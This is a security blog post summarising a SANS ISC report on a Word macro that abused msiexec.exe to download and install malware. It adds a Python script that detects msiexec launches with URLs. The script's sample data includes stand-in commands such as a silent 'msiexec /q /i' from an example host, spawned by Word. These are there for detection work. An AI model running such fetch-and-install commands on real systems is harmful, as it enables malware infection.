Antivirus Evasion – msiexec obfuscation

May 25, 2018

A SANS ISC InfoSec diary entry described yet another infection case, and one that only a handful of antivirus engines detected. From the attacker's perspective that is a very good result, all the more so because, according to VirusTotal, the engines that did flag the malicious file were not those of the best-known vendors. Unfortunately, the entry does not say which engines were the first to identify the malicious code.

Macro obfuscation and abuse of the Windows Installer

The technique used by the attackers was macro obfuscation (code obfuscation) in a Word document. Analysis of the deobfuscated code showed that the macro did not carry its own download routine; instead it abused 'msiexec.exe', the legitimate Windows Installer binary. msiexec accepts a URL in place of a local package path, so a single command line is enough to make it fetch a file from the attacker's website and install it, and the download itself is performed by a signed Microsoft binary rather than by the macro. Next, the downloaded file communicated with another HTTP address. The effect: malicious code running on the victim's computer. You can add the rest yourselves. From a defender's point of view the pattern is easy to check for: msiexec.exe started with a URL on its command line, particularly as a child of an Office process, is rarely legitimate and is worth an alert.
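As an added example, not code from the original article or from the SANS ISC diary, the check I would run against process-creation telemetry (Sysmon event 1 or Windows 4688 records) to catch this pattern: every msiexec.exe launch whose command line contains a URL is flagged, and the finding is escalated when the parent is an Office application or when a quiet-install switch is present. The sample events, host names and paths below are constructed for the demonstration; the list of Office parents and the switch handling are my own choices, not anything the diary prescribes.

```python
"""
Detect msiexec.exe being used to fetch and install a package from a remote URL,
the living-off-the-land pattern described above. Added example; the log records
are constructed, not taken from the incident.
"""
import re
import shlex
from dataclasses import dataclass
from typing import Optional

# Parents from which a network-fetching msiexec is almost never legitimate (assumption).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# msiexec switches that take a package path (install / administrative install);
# the installer accepts both "/" and "-" as the switch character.
INSTALL_SWITCHES = {"/i", "-i", "/package", "-package", "/a", "-a"}
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (fields Sysmon event 1 / 4688 provide)."""
    image: str
    command_line: str
    parent_image: str


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_command_line(cmd: str) -> list:
    """Tokenise a Windows command line, honouring double quotes; quotes are stripped."""
    try:
        tokens = shlex.split(cmd, posix=False)
    except ValueError:  # unbalanced quote: fall back to a plain whitespace split
        tokens = cmd.split()
    return [t.strip('"') for t in tokens]


def analyze(event: ProcessEvent) -> Optional[dict]:
    """Return a finding for an msiexec.exe launch that references a remote package, else None."""
    if image_name(event.image) != "msiexec.exe":
        return None
    tokens = split_command_line(event.command_line)
    urls = [t for t in tokens if URL_RE.match(t)]
    if not urls:
        return None  # local .msi: ordinary software installation, not interesting here
    lowered = [t.lower() for t in tokens]
    # /q, /qn, /qb, /quiet and /passive all suppress or reduce the installer UI.
    quiet = any(t.startswith(("/q", "-q", "/passive", "-passive")) for t in lowered)
    install_switch = next((t for t in lowered if t in INSTALL_SWITCHES), None)
    parent = image_name(event.parent_image)
    if parent in OFFICE_PARENTS:
        severity = "high"  # Office document spawning a downloader: the macro case
    elif quiet:
        severity = "medium"  # silent remote install from a shell or script
    else:
        severity = "low"
    return {
        "severity": severity,
        "parent": parent,
        "urls": urls,
        "install_switch": install_switch,
        "quiet": quiet,
        "command_line": event.command_line,
    }


def scan(events) -> list:
    """Run analyze() over a sequence of events and keep only the findings."""
    return [f for f in (analyze(e) for e in events) if f]


# Constructed sample telemetry: one macro-style launch, one benign local install,
# one service-triggered msiexec, one scripted silent remote install, one unrelated process.
EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 "msiexec /q /i http://package.example/update.msi",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "C:\Users\bob\Downloads\7z1805-x64.msi"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V",
                 r"C:\Windows\System32\services.exe"),
    ProcessEvent(r"C:\Windows\SysWOW64\msiexec.exe",
                 "msiexec -package https://cdn.example/agent.msi /qn",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
                 r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(f"[{finding['severity']}] parent={finding['parent']} "
              f"urls={finding['urls']} quiet={finding['quiet']}")
```

Flagging any URL anywhere on the command line, rather than only the token after /i, is deliberate: msiexec also takes the package via /package and /a, and the switch order is free, so keying on the URL is harder to evade than keying on a particular switch. The local-path case is intentionally left silent so the rule stays usable on hosts where ordinary MSI installs are routine.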

A detailed description of the file can be found in the source linked below.

Finally, one more point worth noting: it is not only the top antivirus products that are able to flag malicious files effectively.

Source: SANS ISC InfoSec

Do you need cybersecurity solutions for your company? Then contact us.

Published by: Piotr Mierzwiński
